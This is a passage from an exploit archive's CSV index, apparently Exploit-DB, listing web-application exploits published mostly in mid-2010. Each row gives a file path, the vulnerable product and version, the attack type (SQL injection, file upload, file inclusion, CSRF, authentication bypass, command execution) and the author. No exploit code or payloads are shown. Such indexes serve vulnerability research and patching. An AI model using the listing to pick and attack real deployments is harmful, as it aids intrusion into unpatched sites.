Injection",2010-07-01,RoAd_KiLlEr,php,webapps, -14155,exploits/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,asp,webapps, -14209,exploits/php/webapps/14209.txt,"Joomla! Component Front-End Article Manager System - Arbitrary File Upload",2010-07-04,Sid3^effects,php,webapps, -14165,exploits/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,php,webapps, -14163,exploits/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",php,webapps, -14164,exploits/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection",2010-07-02,"Salvatore Fresta",php,webapps, -14160,exploits/php/webapps/14160.txt,"Interscan Web Security 5.0 - Persistent Cross-Site Scripting",2010-07-01,"Ivan Huertas",php,webapps, -14177,exploits/linux/webapps/14177.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (1)",2010-07-02,"Marcos Garcia & Maximiliano Soler",linux,webapps, -14162,exploits/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injections",2010-07-01,"Salvatore Fresta",php,webapps, -14176,exploits/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",php,webapps, -14166,exploits/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion",2010-07-02,"John Leitch",php,webapps, -14171,exploits/php/webapps/14171.txt,"Iphone Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps, -14172,exploits/php/webapps/14172.txt,"Joomla! Component com_seyret - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,php,webapps, -14170,exploits/php/webapps/14170.txt,"Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,php,webapps, -14168,exploits/asp/webapps/14168.txt,"VGM Forbin - 'article.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps, -14169,exploits/asp/webapps/14169.txt,"MooreAdvice - 'productlist.asp' SQL Injection",2010-07-02,"Th3 RDX",asp,webapps, -14183,exploits/php/webapps/14183.txt,"Joomla! Component com_seyret - Local File Inclusion",2010-07-03,"Cooler_ unix",php,webapps, -14192,exploits/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps, -14184,exploits/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps, -14186,exploits/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps, -14187,exploits/php/webapps/14187.txt,"Joomla! Component eventCal 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps, -14188,exploits/php/webapps/14188.html,"cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps, -14193,exploits/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps, -14208,exploits/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps, -14196,exploits/php/webapps/14196.txt,"Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps, -14197,exploits/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",php,webapps, -14198,exploits/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",php,webapps, -14199,exploits/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - 'show.php?id' SQL Injection",2010-07-04,Shafiq-Ur-Rehman,php,webapps, -14201,exploits/php/webapps/14201.txt,"PHPaaCMS - 'list.php?id' SQL Injection",2010-07-04,CoBRa_21,php,webapps, -14202,exploits/php/webapps/14202.txt,"iLister Listing Software - Local File Inclusion",2010-07-04,Sid3^effects,php,webapps, -14203,exploits/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps, -14204,exploits/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps, -14205,exploits/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps, -14206,exploits/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps, -14207,exploits/php/webapps/14207.txt,"Joomla! Component Phoca Gallery 2.7.3 - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps, -14210,exploits/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps, -14211,exploits/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps, -14213,exploits/php/webapps/14213.txt,"Joomla! Component com_sef - Local File Inclusion",2010-07-05,_mlk_,php,webapps, -14214,exploits/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,php,webapps, -14217,exploits/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",php,webapps, -14250,exploits/php/webapps/14250.txt,"Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Blind SQL Injection",2010-07-06,Sid3^effects,php,webapps, -14223,exploits/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps, -14224,exploits/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps, -14225,exploits/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps, -14226,exploits/php/webapps/14226.txt,"Bs Home_Classifieds Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps, -14227,exploits/php/webapps/14227.txt,"Bs Events_Locator Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps, -14228,exploits/php/webapps/14228.txt,"Bs General_Classifieds Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps, -14229,exploits/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,php,webapps, -14230,exploits/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,php,webapps, -33410,exploits/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin C. Klein Keane",php,webapps, -14232,exploits/php/webapps/14232.txt,"Joomla! Component JPodium 2.7.3 - SQL Injection",2010-07-05,RoAd_KiLlEr,php,webapps, -14233,exploits/php/webapps/14233.txt,"Bs Auction Script - SQL Injection",2010-07-05,Sid3^effects,php,webapps, -14237,exploits/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web Application Vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps, -14238,exploits/php/webapps/14238.txt,"BS Auction - SQL Injection",2010-07-06,"Easy Laster",php,webapps, -14239,exploits/php/webapps/14239.txt,"Auto Dealer - SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps, -14240,exploits/php/webapps/14240.txt,"BS Auto Classifieds - 'info.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps, -14241,exploits/php/webapps/14241.txt,"BS Business Directory - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps, -14242,exploits/php/webapps/14242.txt,"BS Classifieds Ads - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps, -14243,exploits/php/webapps/14243.txt,"BS Events Directory - 'articlesdetails.php' SQL Injection (PoC)",2010-07-06,"Easy Laster",php,webapps, -14244,exploits/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection",2010-07-06,Sid3^effects,php,webapps, -14245,exploits/php/webapps/14245.txt,"PreProject Multi-Vendor Shopping Malls - SQL Injection / Authentication Bypass",2010-07-06,**RoAd_KiLlEr**,php,webapps, -14249,exploits/php/webapps/14249.txt,"Joomla! Component AutarTimonial 1.0.8 - SQL Injection",2010-07-06,Sid3^effects,php,webapps, -14251,exploits/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection",2010-07-06,S.W.T,php,webapps, -14285,exploits/windows/webapps/14285.txt,"Outlook Web Access 2007 - Cross-Site Request Forgery",2010-07-08,"Rosario Valotta",windows,webapps, -14255,exploits/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps, -14259,exploits/php/webapps/14259.txt,"Green Shop - SQL Injection",2010-07-07,PrinceofHacking,php,webapps, -14260,exploits/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,php,webapps, -14262,exploits/php/webapps/14262.txt,"Simple Document Management System - SQL Injection",2010-07-07,Sid3^effects,php,webapps, -14264,exploits/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Configuration Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps, -14263,exploits/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps, -14265,exploits/php/webapps/14265.txt,"Joomla! Component PaymentsPlus 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps, -14270,exploits/php/webapps/14270.txt,"Zylone IT - Multiple Blind SQL Injections",2010-07-08,Callo,php,webapps, -14271,exploits/php/webapps/14271.txt,"Pithcms - 'theme' Local/Remote File Inclusion",2010-07-08,eidelweiss,php,webapps, -14277,exploits/php/webapps/14277.txt,"Inout Music 1.0 - Arbitrary File Upload",2010-07-08,SONIC,php,webapps, -14278,exploits/php/webapps/14278.txt,"Inout Article Base Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps, -14279,exploits/php/webapps/14279.txt,"Inout Ad server Ultimate - Arbitrary File Upload",2010-07-08,SONIC,php,webapps, -14280,exploits/php/webapps/14280.txt,"PG Social Networking - Arbitrary File Upload",2010-07-08,SONIC,php,webapps, -14281,exploits/asp/webapps/14281.txt,"KMSoft GB - SQL Injection",2010-07-08,SONIC,asp,webapps, -14283,exploits/asp/webapps/14283.txt,"ClickGallery Server - SQL Injection",2010-07-08,SONIC,asp,webapps, -14284,exploits/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerabilities",2010-07-08,SONIC,asp,webapps, -14289,exploits/php/webapps/14289.html,"b2evolution 3.3.3 - Cross-Site Request Forgery",2010-07-09,saudi0hacker,php,webapps, -14293,exploits/php/webapps/14293.txt,"Joomla! Component Minify4Joomla - Arbitrary File Upload / Persistent Cross-Site Scripting",2010-07-09,Sid3^effects,php,webapps, -14291,exploits/php/webapps/14291.txt,"Joomla! Component IXXO Cart - SQL Injection",2010-07-09,Sid3^effects,php,webapps, -14434,exploits/php/webapps/14434.txt,"Joomla! Component com_jomtube - 'user_id' Blind SQL Injection",2010-07-22,SixP4ck3r,php,webapps, -14312,exploits/php/webapps/14312.txt,"Joomla! Component redSHOP 1.0 - 'pid' SQL Injection",2010-07-10,v3n0m,php,webapps, -14296,exploits/php/webapps/14296.txt,"Joomla! Component QuickFAQ 1.0.3 - Blind SQL Injection",2010-07-09,RoAd_KiLlEr,php,webapps, -14316,exploits/php/webapps/14316.pl,"PHP-Nuke 8.0 -Web_Links Module - Blind SQL Injection",2010-07-10,yawn,php,webapps, -14299,exploits/php/webapps/14299.txt,"CMS Contentia - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps, -14306,exploits/php/webapps/14306.txt,"HoloCMS 9.0.47 - 'news.php' SQL Injection",2010-07-09,GlaDiaT0R,php,webapps, -14308,exploits/php/webapps/14308.txt,"WordPress Plugin Firestats - Remote Configuration File Download",2010-07-09,"Jelmer de Hen",php,webapps, -14310,exploits/php/webapps/14310.js,"dotDefender 3.8-5 - Unauthenticated Remote Code Execution (via Cross-Site Scripting)",2010-07-09,rAWjAW,php,webapps,80 -14313,exploits/php/webapps/14313.txt,"Joomla! Component MyHome - Blind SQL Injection",2010-07-10,Sid3^effects,php,webapps, -14315,exploits/php/webapps/14315.txt,"Joomla! Component MySMS - Arbitrary File Upload",2010-07-10,Sid3^effects,php,webapps, -14335,exploits/php/webapps/14335.txt,"Joomla! Component healthstats - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps, -14318,exploits/php/webapps/14318.html,"Elite CMS 1.01 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities",2010-07-10,10n1z3d,php,webapps, -14319,exploits/php/webapps/14319.pl,"PHP-Nuke 8.1.0.3.5b - Remote Command Execution",2010-07-10,yawn,php,webapps, -14320,exploits/php/webapps/14320.pl,"PHP-Nuke 8.1.0.3.5b (Your_Account Module) - Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps, -14324,exploits/php/webapps/14324.txt,"Sillaj time tracking tool - Authentication Bypass",2010-07-10,"L0rd CrusAd3r",php,webapps, -14325,exploits/php/webapps/14325.txt,"My Kazaam Notes Management System - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps, -14326,exploits/php/webapps/14326.txt,"My Kazaam Address & Contact ORGanizer - SQL Injection",2010-07-10,v3n0m,php,webapps, -14327,exploits/php/webapps/14327.txt,"Joomla! Component Rapid-Recipe - Persistent Cross-Site Scripting",2010-07-10,Sid3^effects,php,webapps, -14328,exploits/php/webapps/14328.html,"Macs CMS 1.1.4 - Cross-Site Scripting / Cross-Site Request Forgery",2010-07-11,10n1z3d,php,webapps, -14329,exploits/php/webapps/14329.html,"Frog CMS 0.9.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps, -14330,exploits/php/webapps/14330.html,"TomatoCart 1.0.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps, -14331,exploits/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps, -14336,exploits/php/webapps/14336.txt,"Joomla! Component EasyBlog - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps, -14337,exploits/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps, -14338,exploits/php/webapps/14338.html,"Getsimple CMS 2.01 - Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps, -14342,exploits/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps, -14355,exploits/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps, -14350,exploits/php/webapps/14350.txt,"Joomla! Component com_qcontacts - SQL Injection",2010-07-13,_mlk_,php,webapps, -14351,exploits/php/webapps/14351.txt,"I-net Enquiry Management Script - SQL Injection",2010-07-13,D4rk357,php,webapps, -14353,exploits/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-13,10n1z3d,php,webapps, -14354,exploits/php/webapps/14354.txt,"AJ Article 3.0 - Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps, -14356,exploits/php/webapps/14356.txt,"CustomCMS - Persistent Cross-Site Scripting",2010-07-13,Sid3^effects,php,webapps, -14357,exploits/php/webapps/14357.txt,"2DayBiz Businesscard Script - Authentication Bypass",2010-07-14,D4rk357,php,webapps, -14362,exploits/php/webapps/14362.txt,"CMSQLite - SQL Injection",2010-07-14,"High-Tech Bridge SA",php,webapps, -14365,exploits/php/webapps/14365.txt,"Campsite CMS - Remote Persistent Cross-Site Scripting",2010-07-15,D4rk357,php,webapps, -14366,exploits/php/webapps/14366.txt,"Whizzy CMS 10.01 - Local File Inclusion",2010-07-15,"Anarchy Angel",php,webapps, -14368,exploits/php/webapps/14368.txt,"Joomla! Component redSHOP 1.0.23.1 - Blind SQL Injection",2010-07-15,"Salvatore Fresta",php,webapps, -14369,exploits/jsp/webapps/14369.txt,"ORACLE Business Process Management (Process Administrator) 5.7-6.0-10.3 - Cross-Site Scripting",2010-07-15,Markot,jsp,webapps, -14370,exploits/php/webapps/14370.txt,"BS Scripts Directory - 'info.php' SQL Injection",2010-07-15,D4rk357,php,webapps, -14371,exploits/php/webapps/14371.txt,"BS Scripts Directory - 'articlesdetails.php' SQL Injection",2010-07-16,k4k4shi,php,webapps, -14374,exploits/php/webapps/14374.txt,"Pre Web Host System - Authentication Bypass",2010-07-16,D4rk357,php,webapps, -14375,exploits/php/webapps/14375.txt,"Pre Dynamic Institution - Web Authentication Bypass",2010-07-16,D4rk357,php,webapps, -14376,exploits/php/webapps/14376.txt,"Pre E-Smart Cart - Authentication Bypass",2010-07-16,D4rk357,php,webapps, -14377,exploits/php/webapps/14377.txt,"Pre SoftClones Marketing Management System - Authentication Bypass",2010-07-16,D4rk357,php,webapps, -14378,exploits/php/webapps/14378.txt,"Pre Podcast Portal - Authentication Bypass",2010-07-16,D4rk357,php,webapps, -14381,exploits/php/webapps/14381.txt,"Group Office - Remote Command Execution",2010-07-16,"ADEO Security",php,webapps, -14382,exploits/windows/webapps/14382.txt,"ActiTime 2.0-MA - Cross-Site Request Forgery",2010-07-16,Markot,windows,webapps, -14383,exploits/php/webapps/14383.txt,"Group Office - 'comment_id' SQL Injection",2010-07-16,"Canberk BOLAT",php,webapps, -14420,exploits/asp/webapps/14420.txt,"Mayasan Portal 2.0 - 'makaledetay.asp' SQL Injection",2010-07-20,v0calist,asp,webapps, -14421,exploits/asp/webapps/14421.txt,"Mayasan Portal 2.0 - 'haberdetay.asp' SQL Injection",2010-07-20,CoBRa_21,asp,webapps, -14389,exploits/php/webapps/14389.txt,"Freelancers Marketplace Script - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps, -14390,exploits/php/webapps/14390.txt,"Freelancer Marketplace Script - Arbitrary File Upload",2010-07-17,Sid3^effects,php,webapps, -14391,exploits/php/webapps/14391.txt,"Subrion Auto Classifieds - Persistent Cross-Site Scripting",2010-07-17,Sid3^effects,php,webapps, -14392,exploits/php/webapps/14392.txt,"Kayako eSupport 3.70.02 - SQL Injection",2010-07-17,Sid3^effects,php,webapps, -14393,exploits/php/webapps/14393.txt,"Calendarix - 'cal_cat.php' SQL Injection",2010-07-17,SixP4ck3r,php,webapps, -14394,exploits/php/webapps/14394.txt,"Joomla! Component com_spa - SQL Injection (2)",2010-07-17,"Palyo34 & KroNicKq",php,webapps, -14395,exploits/php/webapps/14395.txt,"Joomla! Component StaticXT - SQL Injection",2010-07-17,"Palyo34 & KroNicKq",php,webapps, -14404,exploits/php/webapps/14404.txt,"Kayako eSupport 3.70.02 - 'functions.php' SQL Injection",2010-07-18,ScOrPiOn,php,webapps, -14405,exploits/php/webapps/14405.txt,"PHP-Fusion - Remote Command Execution",2010-07-18,"ViRuS Qalaa",php,webapps, -14401,exploits/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps, -14410,exploits/php/webapps/14410.txt,"rapidCMS 2.0 - Authentication Bypass",2010-07-18,Mahjong,php,webapps, -14415,exploits/php/webapps/14415.html,"EZ-osCommerce 3.1 - Arbitrary File Upload",2010-07-20,indoushka,php,webapps, -14419,exploits/asp/webapps/14419.txt,"Caner Hikaye Script - SQL Injection",2010-07-20,v0calist,asp,webapps, -14423,exploits/php/webapps/14423.txt,"Joomla! Component com_spa - SQL Injection (1)",2010-07-20,ALTBTA,php,webapps, -14425,exploits/php/webapps/14425.txt,"PHP Chat for 123 Flash Chat - Remote File Inclusion",2010-07-20,"HaCkEr arar",php,webapps, -14426,exploits/php/webapps/14426.pl,"Imagine-cms 2.50 - SQL Injection",2010-07-21,Metropolis,php,webapps, -14427,exploits/windows/webapps/14427.txt,"Outlook Web Access 2003 - Cross-Site Request Forgery",2010-07-21,anonymous,windows,webapps, -14432,exploits/php/webapps/14432.txt,"OpenX - 'phpAdsNew' Remote File Inclusion",2010-07-21,"ViRuS Qalaa",php,webapps, -14430,exploits/php/webapps/14430.txt,"RapidLeech Scripts - Arbitrary File Upload",2010-07-21,H-SK33PY,php,webapps, -14435,exploits/php/webapps/14435.txt,"AJ HYIP PRIME - 'welcome.php?id' Blind SQL Injection",2010-07-22,JosS,php,webapps, -14436,exploits/php/webapps/14436.txt,"AJ HYIP MERIDIAN - 'news.php?id' Blind SQL Injection",2010-07-22,JosS,php,webapps, -14437,exploits/php/webapps/14437.txt,"Free PHP photo Gallery script - Remote Command Execution",2010-07-22,"ViRuS Qalaa",php,webapps, -14438,exploits/php/webapps/14438.txt,"Free PHP Photo Gallery Script - Remote File Inclusion",2010-07-22,"ViRuS Qalaa",php,webapps, -14439,exploits/php/webapps/14439.txt,"phpBazar Admin - Information Disclosure",2010-07-22,Net_Spy,php,webapps, -14440,exploits/php/webapps/14440.txt,"phpBB MOD 2.0.19 - Invitation Only (PassCode Bypass)",2010-07-22,Silic0n,php,webapps, -14441,exploits/php/webapps/14441.txt,"WordPress Plugin myLDlinker - SQL Injection",2010-07-22,H-SK33PY,php,webapps, -14442,exploits/php/webapps/14442.txt,"ZeeAdbox 2.x - SQL Injection",2010-07-23,SONIC,php,webapps, -14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,php,webapps, -14444,exploits/php/webapps/14444.txt,"ZeeNetworking 1x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps, -14445,exploits/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload",2010-07-23,SONIC,php,webapps, -14446,exploits/php/webapps/14446.txt,"PhotoPost - PHP SQL Injection",2010-07-23,Cyber-sec,php,webapps, -14448,exploits/php/webapps/14448.txt,"Joomla! Component Golf Course Guide 0.9.6.0 - SQL Injection",2010-07-23,Valentin,php,webapps, -14449,exploits/php/webapps/14449.txt,"Joomla! Component Huru Helpdesk - SQL Injection (2)",2010-07-23,Amine_92,php,webapps, -14450,exploits/php/webapps/14450.txt,"Joomla! Component com_iproperty - SQL Injection",2010-07-23,Amine_92,php,webapps, -14453,exploits/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - 'ecard.php' SQL Injection",2010-07-23,CoBRa_21,php,webapps, -14454,exploits/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps, -14455,exploits/php/webapps/14455.txt,"vBulletin 3.8.6 - 'faq.php' Information Disclosure",2010-07-24,H-SK33PY,php,webapps, -14457,exploits/php/webapps/14457.txt,"DM FileManager 3.9.11 - Arbitrary File Upload",2010-07-24,eidelweiss,php,webapps, -14458,exploits/php/webapps/14458.txt,"sNews - 'index.php' SQL Injection",2010-07-24,MajoR,php,webapps, -14459,exploits/php/webapps/14459.txt,"Open Realty 2.x/3.x - Persistent Cross-Site Scripting",2010-07-24,K053,php,webapps, -14461,exploits/asp/webapps/14461.txt,"AKY Blog - SQL Injection",2010-07-24,v0calist,asp,webapps, -14462,exploits/php/webapps/14462.txt,"Joomla! Component Ozio Gallery - SQL Injection",2010-07-24,"ViRuS Qalaa",php,webapps, -14463,exploits/php/webapps/14463.txt,"Joomla! Component com_itarmory - SQL Injection",2010-07-24,Craw,php,webapps, -14465,exploits/php/webapps/14465.txt,"sNews 1.7 - 'index.php?category' SQL Injection",2010-07-24,CoBRa_21,php,webapps, -14466,exploits/php/webapps/14466.txt,"Joomla! Component Joomdle 0.24 - SQL Injection",2010-07-24,kaMtiEz,php,webapps, -14467,exploits/php/webapps/14467.txt,"Joomla! Component YouTube 1.5 - SQL Injection",2010-07-24,Forza-Dz,php,webapps, -14469,exploits/php/webapps/14469.txt,"XAOS CMS - SQL Injection",2010-07-25,H-SK33PY,php,webapps, -14470,exploits/php/webapps/14470.txt,"Ballettin Forum - SQL Injection",2010-07-25,3v0,php,webapps, -14471,exploits/php/webapps/14471.txt,"CMS Ignition - SQL Injection",2010-07-25,neavorc,php,webapps, -14472,exploits/php/webapps/14472.txt,"WhiteBoard 0.1.30 - Multiple Blind SQL Injections",2010-07-25,"Salvatore Fresta",php,webapps, -14483,exploits/php/webapps/14483.pl,"PunBB 1.3.4 / Pun_PM 1.2.6 - Blind SQL Injection",2010-07-27,Dante90,php,webapps, -14474,exploits/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 - SQL Injection",2010-07-26,**RoAd_KiLlEr**,php,webapps, -14476,exploits/php/webapps/14476.txt,"Joomla! Component Visites 1.1 RC2 - Remote File Inclusion",2010-07-26,Li0n-PaL,php,webapps, -14481,exploits/php/webapps/14481.txt,"Joomla! Component TTVideo 1.0 - SQL Injection",2010-07-27,"Salvatore Fresta",php,webapps, -14485,exploits/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps, -14488,exploits/php/webapps/14488.txt,"Joomla! Component com_appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps, -14490,exploits/php/webapps/14490.txt,"nuBuilder - Remote File Inclusion",2010-07-28,Ahlspiess,php,webapps, -14494,exploits/php/webapps/14494.txt,"AV Arcade 3 - Cookie Authentication Bypass",2010-07-28,saudi0hacker,php,webapps, -14495,exploits/php/webapps/14495.txt,"Joomla! Component com_photomapgallery 1.6.0 - Multiple Blind SQL Injections",2010-07-28,"Salvatore Fresta",php,webapps, -14499,exploits/php/webapps/14499.txt,"Joomla! Component com_pbbooking 1.0.4_3 - Multiple Blind SQL Injections",2010-07-29,"Salvatore Fresta",php,webapps, -14500,exploits/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps, -14501,exploits/php/webapps/14501.txt,"Joomla! Component com_SimpleShop - SQL Injection",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps, -14502,exploits/php/webapps/14502.txt,"Joomla! Component com_beamospetition - SQL Injection",2010-07-29,Forza-Dz,php,webapps, -14518,exploits/php/webapps/14518.txt,"Joomla! Component com_spielothek 1.6.9 - Multiple Blind SQL Injections",2010-07-31,"Salvatore Fresta",php,webapps, -14521,exploits/hardware/webapps/14521.txt,"Intellinet IP Camera MNC-L10 - Authentication Bypass",2010-08-01,Magnefikko,hardware,webapps, -14523,exploits/php/webapps/14523.txt,"SnoGrafx - 'cat.php?cat' SQL Injection",2010-08-02,CoBRa_21,php,webapps, -14528,exploits/php/webapps/14528.txt,"APT-WEBSHOP-SYSTEM - 'modules.php' SQL Injection",2010-08-02,secret,php,webapps, -14530,exploits/php/webapps/14530.txt,"Joomla! Component CamelcityDB 2.2 - SQL Injection",2010-08-02,Amine_92,php,webapps, -14531,exploits/php/webapps/14531.txt,"MyIT CRM - Multiple Cross-Site Scripting Vulnerabilities",2010-08-02,"Juan Manuel Garcia",php,webapps, -14534,exploits/php/webapps/14534.txt,"68KB 1.0.0rc4 - Remote File Inclusion",2010-08-03,eidelweiss,php,webapps, -14558,exploits/php/webapps/14558.txt,"sX-Shop - Multiple SQL Injections",2010-08-05,CoBRa_21,php,webapps, -14541,exploits/php/webapps/14541.txt,"WordPress Plugin NextGEN Smooth Gallery 0.12 - Blind SQL Injection",2010-08-03,kaMtiEz,php,webapps, -14547,exploits/windows/webapps/14547.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'OvJavaLocale' Buffer Overflow",2010-08-03,"Nahuel Riva",windows,webapps, -14557,exploits/php/webapps/14557.txt,"sX-Shop - 'view_image.php' SQL Injection",2010-08-05,secret,php,webapps, -14556,exploits/php/webapps/14556.txt,"Nuked-klaN Module Partenaires NK 1.5 - Blind SQL Injection",2010-08-05,Metropolis,php,webapps, -14559,exploits/php/webapps/14559.txt,"APBoard 2.1.0 - 'board.php?id' SQL Injection",2010-08-05,secret,php,webapps, -14560,exploits/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusions",2010-08-05,eidelweiss,php,webapps, -14569,exploits/php/webapps/14569.txt,"Joomla! Component com_cgtestimonial 2.2 - Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps, -14562,exploits/php/webapps/14562.html,"Open Blog 1.2.1 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps, -14563,exploits/php/webapps/14563.html,"BXR 0.6.8 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps, -14564,exploits/php/webapps/14564.html,"Amethyst 0.1.5 - Cross-Site Scripting",2010-08-05,"High-Tech Bridge SA",php,webapps, -14565,exploits/php/webapps/14565.html,"DiamondList 0.1.6 - Cross-Site Request Forgery",2010-08-05,"High-Tech Bridge SA",php,webapps, -14570,exploits/php/webapps/14570.txt,"Joomla! Component NeoRecruit 1.4 - SQL Injection",2010-08-07,v3n0m,php,webapps, -14572,exploits/php/webapps/14572.txt,"Tycoon CMS Record Script 1.0.9 - SQL Injection",2010-08-07,Silic0n,php,webapps, -14578,exploits/php/webapps/14578.php,"PHPKick 0.8 - 'Statistics.php' SQL Injection",2010-08-08,garwga,php,webapps, -14585,exploits/php/webapps/14585.php,"kleeja 1.0.0RC6 - Database Disclosure",2010-08-09,indoushka,php,webapps, -14598,exploits/php/webapps/14598.txt,"Joomla! Component Teams - Multiple Blind SQL 